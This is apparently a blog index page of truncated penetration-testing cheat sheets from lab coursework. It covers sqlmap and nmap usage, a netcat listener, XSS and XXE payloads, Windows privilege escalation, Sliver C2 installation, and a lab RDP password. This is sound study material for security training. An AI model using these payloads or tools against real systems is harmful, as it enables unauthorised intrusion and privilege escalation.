Welcome to 0pwn0's Blog

MySQL Command Description General mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database SHOW DATABASES List available databases USE users Switch to database Tables CREATE TABLE logins (id INT, ...) Add a new table SHOW TABLES List available tables in current database DESCRIBE logins Show table properties and columns INSERT INTO table_name VALUES (value_1,..) Add values to table INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) Add valu...

NMAP Scanning Options Nmap Option Description 10.10.10.0/24 Target network range. -sn Disables port scanning. -Pn Disables ICMP Echo Requests -n Disables DNS Resolution. -PE Performs the ping scan by using ICMP Echo Requests against the target. --packet-trace Shows all packets sent and received. --reason Displays the reason for a specific result. --disable-arp-ping Disables ARP Ping Requests. --top-ports=<num> Scans the specified top ports that have been defined as ...

Command Description sqlmap -h View the basic help menu sqlmap -hh View the advanced help menu sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk sqlmap -r req.txt Passing an HTTP req...

Commands Description xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol env Works with many different command language interpreters to discover the environmental variables of a system. This is a great way to find out which shell language is in use sudo nc -lvnp <port #> Starts a netcat listener on a specified port nc -nv <ip address of computer with listener started><port b...

HTTP Verb TamperingHTTP Method HEAD PUT DELETE OPTIONS PATCH Command Description -X OPTIONS Set HTTP Method with Curl IDORIdentify IDORS In URL parameters & APIs In AJAX Calls By understanding reference hashing/encoding By comparing user roles Command Description md5sum MD5 hash a string base64 Base64 encode a string XXE Code Description <!ENTITY xxe SYSTEM "http://localhost/email.dtd"> Define External Entity to a URL <!ENTITY xxe SYSTEM &qu...

Burp Shortcuts Shortcut Description [CTRL+R] Send to repeater [CTRL+SHIFT+R] Go to repeater [CTRL+I] Send to intruder [CTRL+SHIFT+I] Go to intruder [CTRL+U] URL encode [CTRL+SHIFT+U] URL decode ZAP Shortcuts Shortcut Description [CTRL+B] Toggle intercept on/off [CTRL+R] Go to replacer [CTRL+E] Go to encode/decode/hash Firefox Shortcuts Shortcut Description [CTRL+SHIFT+R] Force Refresh Page

Initial Enumeration Command Description xfreerdp /v:<target ip> /u:htb-student RDP to lab target ipconfig /all Get interface, IP address and DNS information arp -a Review ARP table route print Review routing table Get-MpComputerStatus Check Windows Defender status Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections List AppLocker rules Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone Test AppLocker po...

Commands Code Description XSS Payloads <script>alert(window.origin)</script> Basic XSS Payload <plaintext> Basic XSS Payload <script>print()</script> Basic XSS Payload <img src="" onerror=alert(window.origin)> HTML-based XSS Payload <script>document.body.style.background = "#141d2b"</script> Change Background Color <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg&q...

This comprehensive guide covers various methods to escalate privileges on Windows systems through leveraging dangerous privileges and group memberships. Understanding these escalation vectors is crucial for both defenders and security professionals. PrivilegesSeBackupPrivilegeOverview:The SeBackupPrivilege allows a user to back up files and directories, regardless of their access permissions. This privilege is particularly dangerous when combined with the ability to bypass Normal Discretiona...

Author of post: SeriotonCTF https://github.com/BishopFox/sliver InstallationDownload both the sliver-server and sliver-client from the release for your platform and you are done :) 1➜ sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux 1➜ sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux 12➜ sliver lssliver-client sliver-server Now we can run the sliver-server and it will drop us in a console where...